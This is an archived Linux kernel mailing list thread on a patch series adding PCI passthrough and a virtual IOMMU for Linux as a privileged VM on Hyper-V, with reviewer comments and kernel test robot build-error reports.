+	.owner = THIS_MODULE,
+};
+
+static void __init hv_initialize_special_domains(void)
+{
+	hv_def_identity_dom.iommu_dom.geometry = default_geometry;
+	hv_def_identity_dom.domid_num = HV_DEVICE_DOMAIN_ID_S2_DEFAULT; /* 0 */
+}
+
+static int __init hv_iommu_init(void)
+{
+	int ret;
+	struct iommu_device *iommup = &hv_virt_iommu;
+
+	if (!hv_is_hyperv_initialized())
+		return -ENODEV;
+
+	ret = iommu_device_sysfs_add(iommup, NULL, NULL, "%s", "hyperv-iommu");
+	if (ret) {
+		pr_err("Hyper-V: iommu_device_sysfs_add failed: %d\n", ret);
+		return ret;
+	}
+
+	/* This must come before iommu_device_register because the latter calls
+	 * into the hooks.
+	 */
+	hv_initialize_special_domains();
+
+	ret = iommu_device_register(iommup, &hv_iommu_ops, NULL);
+	if (ret) {
+		pr_err("Hyper-V: iommu_device_register failed: %d\n", ret);
+		goto err_sysfs_remove;
+	}
+
+	pr_info("Hyper-V IOMMU initialized\n");
+
+	return 0;
+
+err_sysfs_remove:
+	iommu_device_sysfs_remove(iommup);
+	return ret;
+}
+
+void __init hv_iommu_detect(void)
+{
+	if (no_iommu || iommu_detected)
+		return;
+
+	/* For l1vh, always expose an iommu unit */
+	if (!hv_l1vh_partition())
+		if (!(ms_hyperv.misc_features & HV_DEVICE_DOMAIN_AVAILABLE))
+			return;
+
+	iommu_detected = 1;
+	x86_init.iommu.iommu_init = hv_iommu_init;
+
+	pci_request_acs();
+}
diff --git a/include/linux/hyperv.h b/include/linux/hyperv.h
index dfc516c1c719..2ad111727e82 100644
--- a/include/linux/hyperv.h
+++ b/include/linux/hyperv.h
@@ -1767,4 +1767,10 @@ static inline unsigned long virt_to_hvpfn(void *addr)
 #define HVPFN_DOWN(x)	((x) >> HV_HYP_PAGE_SHIFT)
 #define page_to_hvpfn(page)	(page_to_pfn(page) * NR_HV_HYP_PAGES_IN_PAGE)
 
+#ifdef CONFIG_HYPERV_IOMMU
+void __init hv_iommu_detect(void);
+#else
+static inline void hv_iommu_detect(void) { }
+#endif /* CONFIG_HYPERV_IOMMU */
+
 #endif	/* _HYPERV_H */
-- 
2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:27 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com>

Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on the Microsoft Hyper-V hypervisor. This support is made to fit within the workings of the VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs.

There are 3 cases where Linux can run as a privileged VM (aka MSHV): baremetal root (meaning Hyper-V+Linux), L1VH, and nested.

At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices, whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in the VFIO type1 subsystem.

While this Part I focuses on memory mappings, the upcoming Part II will focus on irq bypass along with some minor irq remapping updates.

This patch series was tested using Cloud Hypervisor version 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support in the near future.
Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
On Mon, Jan 19, 2026 at 10:42:21PM -0800, Mukesh R wrote:

There is a Linux standard for giving credit when code is adapted from elsewhere. This doesn't follow that standard. Please fix.

This put must be synchronous, as the device must be detached from the domain before attempting partition destruction. This was explicitly mentioned in the patch that originated this code. Please fix, add a comment, and add credits to the commit message.

Thanks,
Stanislav
{ "author": "Stanislav Kinsburskii <skinsburskii@linux.microsoft.com>", "date": "Tue, 20 Jan 2026 08:09:02 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
On Mon, Jan 19, 2026 at 10:42:22PM -0800, Mukesh R wrote:

Shouldn't the partition be put here?

Thanks,
Stanislav
{ "author": "Stanislav Kinsburskii <skinsburskii@linux.microsoft.com>", "date": "Tue, 20 Jan 2026 08:13:55 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
Hi Mukesh,

kernel test robot noticed the following build errors:

[auto build test ERROR on tip/x86/core]
[also build test ERROR on pci/next pci/for-linus arm64/for-next/core clk/clk-next soc/for-next linus/master arnd-asm-generic/master v6.19-rc6 next-20260119]
[If your patch is applied to the wrong git tree, kindly drop us a note.
And when submitting patch, we suggest to use '--base' as documented in
https://git-scm.com/docs/git-format-patch#_base_tree_information]

url:    https://github.com/intel-lab-lkp/linux/commits/Mukesh-R/iommu-hyperv-rename-hyperv-iommu-c-to-hyperv-irq-c/20260120-145832
base:   tip/x86/core
patch link:    https://lore.kernel.org/r/20260120064230.3602565-2-mrathor%40linux.microsoft.com
patch subject: [PATCH v0 01/15] iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c
config: i386-randconfig-001-20260120 (https://download.01.org/0day-ci/archive/20260121/202601210208.mg3YUkif-lkp@intel.com/config)
compiler: gcc-14 (Debian 14.2.0-19) 14.2.0
reproduce (this is a W=1 build): (https://download.01.org/0day-ci/archive/20260121/202601210208.mg3YUkif-lkp@intel.com/reproduce)

If you fix the issue in a separate patch/commit (i.e. not just a new version of the same patch/commit), kindly add following tags
| Reported-by: kernel test robot <lkp@intel.com>
| Closes: https://lore.kernel.org/oe-kbuild-all/202601210208.mg3YUkif-lkp@intel.com/

All errors (new ones prefixed by >>):

   In file included from drivers/acpi/pci_root.c:20:
     269 |                 __u128  irte;
         |                 ^~~~~~
         |                 __u32

Kconfig warnings: (for reference only)
   WARNING: unmet direct dependencies detected for IRQ_REMAP
   Depends on [n]: IOMMU_SUPPORT [=y] && X86_64 [=n] && X86_IO_APIC [=y] && PCI_MSI [=n] && ACPI [=y]
   Selected by [y]:
   - HYPERV_IOMMU [=y] && IOMMU_SUPPORT [=y] && HYPERV [=y] && X86 [=y]

vim +269 include/linux/dmar.h

2ae21010694e56 Suresh Siddha   2008-07-10  200
2ae21010694e56 Suresh Siddha   2008-07-10  201  struct irte {
b1fe7f2cda2a00 Peter Zijlstra  2023-05-31  202  	union {
b1fe7f2cda2a00 Peter Zijlstra  2023-05-31  203  		struct {
2ae21010694e56 Suresh Siddha   2008-07-10  204  			union {
3bf17472226b00 Thomas Gleixner 2015-06-09  205  				/* Shared between remapped and posted mode*/
2ae21010694e56 Suresh Siddha   2008-07-10  206  				struct {
3bf17472226b00 Thomas Gleixner 2015-06-09  207  					__u64	present		: 1,  /*  0      */
3bf17472226b00 Thomas Gleixner 2015-06-09  208  						fpd		: 1,  /*  1      */
3bf17472226b00 Thomas Gleixner 2015-06-09  209  						__res0		: 6,  /*  2 -  6 */
3bf17472226b00 Thomas Gleixner 2015-06-09  210  						avail		: 4,  /*  8 - 11 */
3bf17472226b00 Thomas Gleixner 2015-06-09  211  						__res1		: 3,  /* 12 - 14 */
3bf17472226b00 Thomas Gleixner 2015-06-09  212  						pst		: 1,  /* 15      */
3bf17472226b00 Thomas Gleixner 2015-06-09  213  						vector		: 8,  /* 16 - 23 */
3bf17472226b00 Thomas Gleixner 2015-06-09  214  						__res2		: 40; /* 24 - 63 */
3bf17472226b00 Thomas Gleixner 2015-06-09  215  				};
3bf17472226b00 Thomas Gleixner 2015-06-09  216
3bf17472226b00 Thomas Gleixner 2015-06-09  217  				/* Remapped mode */
3bf17472226b00 Thomas Gleixner 2015-06-09  218  				struct {
3bf17472226b00 Thomas Gleixner 2015-06-09  219  					__u64	r_present	: 1,  /*  0      */
3bf17472226b00 Thomas Gleixner 2015-06-09  220  						r_fpd		: 1,  /*  1      */
3bf17472226b00 Thomas Gleixner 2015-06-09  221  						dst_mode	: 1,  /*  2      */
3bf17472226b00 Thomas Gleixner 2015-06-09  222  						redir_hint	: 1,  /*  3      */
3bf17472226b00 Thomas Gleixner 2015-06-09  223  						trigger_mode	: 1,  /*  4      */
3bf17472226b00 Thomas Gleixner 2015-06-09  224  						dlvry_mode	: 3,  /*  5 -  7 */
3bf17472226b00 Thomas Gleixner 2015-06-09  225  						r_avail		: 4,  /*  8 - 11 */
3bf17472226b00 Thomas Gleixner 2015-06-09  226  						r_res0		: 4,  /* 12 - 15 */
3bf17472226b00 Thomas Gleixner 2015-06-09  227  						r_vector	: 8,  /* 16 - 23 */
3bf17472226b00 Thomas Gleixner 2015-06-09  228  						r_res1		: 8,  /* 24 - 31 */
3bf17472226b00 Thomas Gleixner 2015-06-09  229  						dest_id		: 32; /* 32 - 63 */
3bf17472226b00 Thomas Gleixner 2015-06-09  230  				};
3bf17472226b00 Thomas Gleixner 2015-06-09  231
3bf17472226b00 Thomas Gleixner 2015-06-09  232  				/* Posted mode */
3bf17472226b00 Thomas Gleixner 2015-06-09  233  				struct {
3bf17472226b00 Thomas Gleixner 2015-06-09  234  					__u64	p_present	: 1,  /*  0      */
3bf17472226b00 Thomas Gleixner 2015-06-09  235  						p_fpd		: 1,  /*  1      */
3bf17472226b00 Thomas Gleixner 2015-06-09  236  						p_res0		: 6,  /*  2 -  7 */
3bf17472226b00 Thomas Gleixner 2015-06-09  237  						p_avail		: 4,  /*  8 - 11 */
3bf17472226b00 Thomas Gleixner 2015-06-09  238  						p_res1		: 2,  /* 12 - 13 */
3bf17472226b00 Thomas Gleixner 2015-06-09  239  						p_urgent	: 1,  /* 14      */
3bf17472226b00 Thomas Gleixner 2015-06-09  240  						p_pst		: 1,  /* 15      */
3bf17472226b00 Thomas Gleixner 2015-06-09  241  						p_vector	: 8,  /* 16 - 23 */
3bf17472226b00 Thomas Gleixner 2015-06-09  242  						p_res2		: 14, /* 24 - 37 */
3bf17472226b00 Thomas Gleixner 2015-06-09  243  						pda_l		: 26; /* 38 - 63 */
2ae21010694e56 Suresh Siddha   2008-07-10  244  				};
2ae21010694e56 Suresh Siddha   2008-07-10  245  				__u64 low;
2ae21010694e56 Suresh Siddha   2008-07-10  246  			};
2ae21010694e56 Suresh Siddha   2008-07-10  247
2ae21010694e56 Suresh Siddha   2008-07-10  248  			union {
3bf17472226b00 Thomas Gleixner 2015-06-09  249  				/* Shared between remapped and posted mode*/
2ae21010694e56 Suresh Siddha   2008-07-10  250  				struct {
3bf17472226b00 Thomas Gleixner 2015-06-09  251  					__u64	sid		: 16, /* 64 - 79 */
3bf17472226b00 Thomas Gleixner 2015-06-09  252  						sq		: 2,  /* 80 - 81 */
3bf17472226b00 Thomas Gleixner 2015-06-09  253  						svt		: 2,  /* 82 - 83 */
3bf17472226b00 Thomas Gleixner 2015-06-09  254  						__res3		: 44; /* 84 - 127 */
3bf17472226b00 Thomas Gleixner 2015-06-09  255  				};
3bf17472226b00 Thomas Gleixner 2015-06-09  256
3bf17472226b00 Thomas Gleixner 2015-06-09  257  				/* Posted mode*/
3bf17472226b00 Thomas Gleixner 2015-06-09  258  				struct {
3bf17472226b00 Thomas Gleixner 2015-06-09  259  					__u64	p_sid		: 16, /* 64 - 79 */
3bf17472226b00 Thomas Gleixner 2015-06-09  260  						p_sq		: 2,  /* 80 - 81 */
3bf17472226b00 Thomas Gleixner 2015-06-09  261  						p_svt		: 2,  /* 82 - 83 */
3bf17472226b00 Thomas Gleixner 2015-06-09  262  						p_res3		: 12, /* 84 - 95 */
3bf17472226b00 Thomas Gleixner 2015-06-09  263  						pda_h		: 32; /* 96 - 127 */
2ae21010694e56 Suresh Siddha   2008-07-10  264  				};
2ae21010694e56 Suresh Siddha   2008-07-10  265  				__u64 high;
2ae21010694e56 Suresh Siddha   2008-07-10  266  			};
2ae21010694e56 Suresh Siddha   2008-07-10  267  		};
b1fe7f2cda2a00 Peter Zijlstra  2023-05-31  268  #ifdef CONFIG_IRQ_REMAP
b1fe7f2cda2a00 Peter Zijlstra  2023-05-31 @269  	__u128  irte;
b1fe7f2cda2a00 Peter Zijlstra  2023-05-31  270  #endif
b1fe7f2cda2a00 Peter Zijlstra  2023-05-31  271  	};
b1fe7f2cda2a00 Peter Zijlstra  2023-05-31  272  };
423f085952fd72 Thomas Gleixner 2010-10-10  273

-- 
0-DAY CI Kernel Test Service
https://github.com/intel/lkp-tests/wiki
{ "author": "kernel test robot <lkp@intel.com>", "date": "Wed, 21 Jan 2026 03:08:24 +0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
Hi Mukesh,

kernel test robot noticed the following build warnings:

[auto build test WARNING on tip/x86/core]
[also build test WARNING on pci/next pci/for-linus arm64/for-next/core soc/for-next linus/master v6.19-rc6]
[cannot apply to clk/clk-next arnd-asm-generic/master next-20260119]
[If your patch is applied to the wrong git tree, kindly drop us a note.
And when submitting patch, we suggest to use '--base' as documented in
https://git-scm.com/docs/git-format-patch#_base_tree_information]

url:    https://github.com/intel-lab-lkp/linux/commits/Mukesh-R/iommu-hyperv-rename-hyperv-iommu-c-to-hyperv-irq-c/20260120-145832
base:   tip/x86/core
patch link:    https://lore.kernel.org/r/20260120064230.3602565-16-mrathor%40linux.microsoft.com
patch subject: [PATCH v0 15/15] mshv: Populate mmio mappings for PCI passthru
config: x86_64-randconfig-003-20260120 (https://download.01.org/0day-ci/archive/20260121/202601210255.2ZZOLtMV-lkp@intel.com/config)
compiler: gcc-14 (Debian 14.2.0-19) 14.2.0
reproduce (this is a W=1 build): (https://download.01.org/0day-ci/archive/20260121/202601210255.2ZZOLtMV-lkp@intel.com/reproduce)

If you fix the issue in a separate patch/commit (i.e. not just a new version of the same patch/commit), kindly add following tags
| Reported-by: kernel test robot <lkp@intel.com>
| Closes: https://lore.kernel.org/oe-kbuild-all/202601210255.2ZZOLtMV-lkp@intel.com/

All warnings (new ones prefixed by >>):

      60 | static int __init setup_hv_full_mmio(char *str)
         |            ^~~~~~~~~~~~~~~~~~

vim +/setup_hv_full_mmio +60 drivers/hv/mshv_root_main.c

    58
    59  bool hv_nofull_mmio; /* don't map entire mmio region upon fault */
  > 60  static int __init setup_hv_full_mmio(char *str)
    61  {
    62  	hv_nofull_mmio = true;
    63  	return 0;
    64  }
    65  __setup("hv_nofull_mmio", setup_hv_full_mmio);
    66

-- 
0-DAY CI Kernel Test Service
https://github.com/intel/lkp-tests/wiki
{ "author": "kernel test robot <lkp@intel.com>", "date": "Wed, 21 Jan 2026 03:52:58 +0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
Hi Mukesh,

kernel test robot noticed the following build warnings:

[auto build test WARNING on tip/x86/core]
[also build test WARNING on pci/next pci/for-linus arm64/for-next/core clk/clk-next soc/for-next linus/master arnd-asm-generic/master v6.19-rc6 next-20260120]
[If your patch is applied to the wrong git tree, kindly drop us a note.
And when submitting patch, we suggest to use '--base' as documented in
https://git-scm.com/docs/git-format-patch#_base_tree_information]

url:    https://github.com/intel-lab-lkp/linux/commits/Mukesh-R/iommu-hyperv-rename-hyperv-iommu-c-to-hyperv-irq-c/20260120-145832
base:   tip/x86/core
patch link:    https://lore.kernel.org/r/20260120064230.3602565-2-mrathor%40linux.microsoft.com
patch subject: [PATCH v0 01/15] iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c
config: i386-allmodconfig (https://download.01.org/0day-ci/archive/20260121/202601210423.wwOrf2K8-lkp@intel.com/config)
compiler: gcc-14 (Debian 14.2.0-19) 14.2.0
reproduce (this is a W=1 build): (https://download.01.org/0day-ci/archive/20260121/202601210423.wwOrf2K8-lkp@intel.com/reproduce)

If you fix the issue in a separate patch/commit (i.e. not just a new version of the same patch/commit), kindly add following tags
| Reported-by: kernel test robot <lkp@intel.com>
| Closes: https://lore.kernel.org/oe-kbuild-all/202601210423.wwOrf2K8-lkp@intel.com/

All warnings (new ones prefixed by >>):

   In file included from drivers/iommu/intel/irq_remapping.c:6:
   include/linux/dmar.h:269:17: error: unknown type name '__u128'; did you mean '__u32'?
     269 |         __u128 irte;
         |         ^~~~~~
         |         __u32
   drivers/iommu/intel/irq_remapping.c: In function 'modify_irte':
   drivers/iommu/intel/irq_remapping.c:181:17: error: unknown type name 'u128'
     181 |         u128 old = irte->irte;
         |         ^~~~
   In file included from arch/x86/include/asm/bug.h:193,
                    from arch/x86/include/asm/alternative.h:9,
                    from arch/x86/include/asm/barrier.h:5,
                    from include/asm-generic/bitops/generic-non-atomic.h:7,
                    from include/linux/bitops.h:28,
                    from include/linux/kernel.h:23,
                    from include/linux/interrupt.h:6,
                    from drivers/iommu/intel/irq_remapping.c:5:
   include/linux/atomic/atomic-arch-fallback.h:326:14: error: void value not ignored as it ought to be
     326 |         ___r = raw_cmpxchg128((_ptr), ___o, (_new)); \
         |              ^
   include/asm-generic/bug.h:110:32: note: in definition of macro 'WARN_ON'
     110 |         int __ret_warn_on = !!(condition); \
         |                                ^~~~~~~~~
   include/linux/atomic/atomic-instrumented.h:4956:9: note: in expansion of macro 'raw_try_cmpxchg128'
    4956 |         raw_try_cmpxchg128(__ai_ptr, __ai_oldp, __VA_ARGS__); \
         |         ^~~~~~~~~~~~~~~~~~
   drivers/iommu/intel/irq_remapping.c:182:26: note: in expansion of macro 'try_cmpxchg128'
     182 |         WARN_ON(!try_cmpxchg128(&irte->irte, &old, irte_modified->irte));
         |                          ^~~~~~~~~~~~~~
   drivers/iommu/intel/irq_remapping.c: In function 'intel_ir_set_vcpu_affinity':
    1270 |                                 ~(-1UL << PDA_HIGH_BIT);
         |                                 ^~

Kconfig warnings: (for reference only)
   WARNING: unmet direct dependencies detected for IRQ_REMAP
   Depends on [n]: IOMMU_SUPPORT [=y] && X86_64 [=n] && X86_IO_APIC [=y] && PCI_MSI [=y] && ACPI [=y]
   Selected by [y]:
   - HYPERV_IOMMU [=y] && IOMMU_SUPPORT [=y] && HYPERV [=y] && X86 [=y]

vim +1270 drivers/iommu/intel/irq_remapping.c

b106ee63abccbba drivers/iommu/intel_irq_remapping.c Jiang Liu           2015-04-13  1241  
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1242  static int intel_ir_set_vcpu_affinity(struct irq_data *data, void *info)
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1243  {
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1244  	struct intel_ir_data *ir_data = data->chip_data;
53527ea1b70224d drivers/iommu/intel/irq_remapping.c Sean Christopherson 2025-06-11  1245  	struct intel_iommu_pi_data *pi_data = info;
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1246  
ed1e48ea4370300 drivers/iommu/intel/irq_remapping.c Jacob Pan           2024-04-23  1247  	/* stop posting interrupts, back to the default mode */
53527ea1b70224d drivers/iommu/intel/irq_remapping.c Sean Christopherson 2025-06-11  1248  	if (!pi_data) {
2454823e97a63d8 drivers/iommu/intel/irq_remapping.c Sean Christopherson 2025-03-19  1249  		__intel_ir_reconfigure_irte(data, true);
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1250  	} else {
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1251  		struct irte irte_pi;
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1252  
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1253  		/*
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1254  		 * We are not caching the posted interrupt entry. We
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1255  		 * copy the data from the remapped entry and modify
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1256  		 * the fields which are relevant for posted mode. The
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1257  		 * cached remapped entry is used for switching back to
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1258  		 * remapped mode.
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1259  		 */
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1260  		memset(&irte_pi, 0, sizeof(irte_pi));
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1261  		dmar_copy_shared_irte(&irte_pi, &ir_data->irte_entry);
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1262  
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1263  		/* Update the posted mode fields */
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1264  		irte_pi.p_pst = 1;
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1265  		irte_pi.p_urgent = 0;
53527ea1b70224d drivers/iommu/intel/irq_remapping.c Sean Christopherson 2025-06-11  1266  		irte_pi.p_vector = pi_data->vector;
53527ea1b70224d drivers/iommu/intel/irq_remapping.c Sean Christopherson 2025-06-11  1267  		irte_pi.pda_l = (pi_data->pi_desc_addr >>
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1268  				 (32 - PDA_LOW_BIT)) & ~(-1UL << PDA_LOW_BIT);
53527ea1b70224d drivers/iommu/intel/irq_remapping.c Sean Christopherson 2025-06-11  1269  		irte_pi.pda_h = (pi_data->pi_desc_addr >> 32) &
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09 @1270  				~(-1UL << PDA_HIGH_BIT);
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1271  
688124cc541f60d drivers/iommu/intel/irq_remapping.c Sean Christopherson 2025-03-19  1272  		ir_data->irq_2_iommu.posted_vcpu = true;
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1273  		modify_irte(&ir_data->irq_2_iommu, &irte_pi);
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1274  	}
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1275  
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1276  	return 0;
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1277  }
8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu             2015-06-09  1278  

-- 
0-DAY CI Kernel Test Service
https://github.com/intel/lkp-tests/wiki
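The Kconfig warning above reports that IRQ_REMAP ends up selected on a 32-bit build even though it depends on X86_64. One conventional way to avoid an unmet-dependency warning is to mirror the selected symbol's dependencies on the `select` line. The fragment below is a hypothetical sketch only: the HYPERV_IOMMU entry body shown here is assumed, and only the dependency list is taken from the warning itself.

```kconfig
# Hypothetical sketch (drivers/iommu/Kconfig). Selecting IRQ_REMAP
# unconditionally from a symbol that is visible on 32-bit x86 trips the
# unmet-dependency warning, because IRQ_REMAP itself depends on X86_64.
# Mirroring those dependencies on the select is one possible fix:
config HYPERV_IOMMU
	bool "Hyper-V IRQ Handling"
	depends on HYPERV && X86
	select IOMMU_API
	select IRQ_REMAP if X86_64 && X86_IO_APIC && PCI_MSI && ACPI
```

An alternative with the same effect is adding `depends on X86_64` to HYPERV_IOMMU itself, at the cost of hiding the option entirely on i386.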
{ "author": "kernel test robot <lkp@intel.com>", "date": "Wed, 21 Jan 2026 05:09:48 +0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com>

Implement passthru of PCI devices to unprivileged virtual machines (VMs)
when Linux is running as a privileged VM on the Microsoft Hyper-V
hypervisor. This support is made to fit within the workings of the VFIO
framework, and any VMM needing to use it must use the VFIO subsystem.
Both full device passthru and SR-IOV based VFs are supported. There are
three cases where Linux can run as a privileged VM (aka MSHV): baremetal
root (meaning Hyper-V+Linux), L1VH, and nested.

At a high level, the hypervisor supports traditional mapped iommu domains
that use explicit map and unmap hypercalls for mapping and unmapping
guest RAM into the iommu subsystem. Hyper-V also has a concept of direct
attach devices, whereby the iommu subsystem simply uses the guest HW page
table (ept/npt/..). This series adds support for both, and both are made
to work with the VFIO type1 subsystem.

While this Part I focuses on memory mappings, the upcoming Part II will
focus on irq bypass along with some minor irq remapping updates.

This patch series was tested using Cloud Hypervisor version 48. Qemu
support for MSHV is in the works, and that will be extended to include
PCI passthru and SR-IOV support in the near future.

Based on: 8f0b4cce4481 (origin/hyperv-next)

Thanks,
-Mukesh

Mukesh Rathor (15):
  iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c
  x86/hyperv: cosmetic changes in irqdomain.c for readability
  x86/hyperv: add insufficient memory support in irqdomain.c
  mshv: Provide a way to get partition id if running in a VMM process
  mshv: Declarations and definitions for VFIO-MSHV bridge device
  mshv: Implement mshv bridge device for VFIO
  mshv: Add ioctl support for MSHV-VFIO bridge device
  PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg
  mshv: Import data structs around device domains and irq remapping
  PCI: hv: Build device id for a VMBus device
  x86/hyperv: Build logical device ids for PCI passthru hcalls
  x86/hyperv: Implement hyperv virtual iommu
  x86/hyperv: Basic interrupt support for direct attached devices
  mshv: Remove mapping of mmio space during map user ioctl
  mshv: Populate mmio mappings for PCI passthru

 MAINTAINERS                         |    1 +
 arch/arm64/include/asm/mshyperv.h   |   15 +
 arch/x86/hyperv/irqdomain.c         |  314 ++++++---
 arch/x86/include/asm/mshyperv.h     |   21 +
 arch/x86/kernel/pci-dma.c           |    2 +
 drivers/hv/Makefile                 |    3 +-
 drivers/hv/mshv_root.h              |   24 +
 drivers/hv/mshv_root_main.c         |  296 +++++++-
 drivers/hv/mshv_vfio.c              |  210 ++++++
 drivers/iommu/Kconfig               |    1 +
 drivers/iommu/Makefile              |    2 +-
 drivers/iommu/hyperv-iommu.c        | 1004 +++++++++++++++++++++------
 drivers/iommu/hyperv-irq.c          |  330 +++++++++
 drivers/pci/controller/pci-hyperv.c |  207 ++++--
 include/asm-generic/mshyperv.h      |    1 +
 include/hyperv/hvgdk_mini.h         |   11 +
 include/hyperv/hvhdk_mini.h         |  112 +++
 include/linux/hyperv.h              |    6 +
 include/uapi/linux/mshv.h           |   31 +
 19 files changed, 2182 insertions(+), 409 deletions(-)
 create mode 100644 drivers/hv/mshv_vfio.c
 create mode 100644 drivers/iommu/hyperv-irq.c

-- 
2.51.2.vfs.0.1
Hi Mukesh,

On Mon, 19 Jan 2026 22:42:15 -0800
Mukesh R <mrathor@linux.microsoft.com> wrote:

I think some introduction/background to L1VH would help.

It may be clearer to state that the hypervisor supports Linux IOMMU
paging domains through map/unmap hypercalls, mapping GPAs to HPAs using
stage-2 I/O page tables.

This may warrant introducing a new IOMMU domain feature flag, as it
performs mappings but does not support map/unmap semantics in the same
way as a paging domain.
{ "author": "Jacob Pan <jacob.pan@linux.microsoft.com>", "date": "Tue, 20 Jan 2026 13:50:32 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }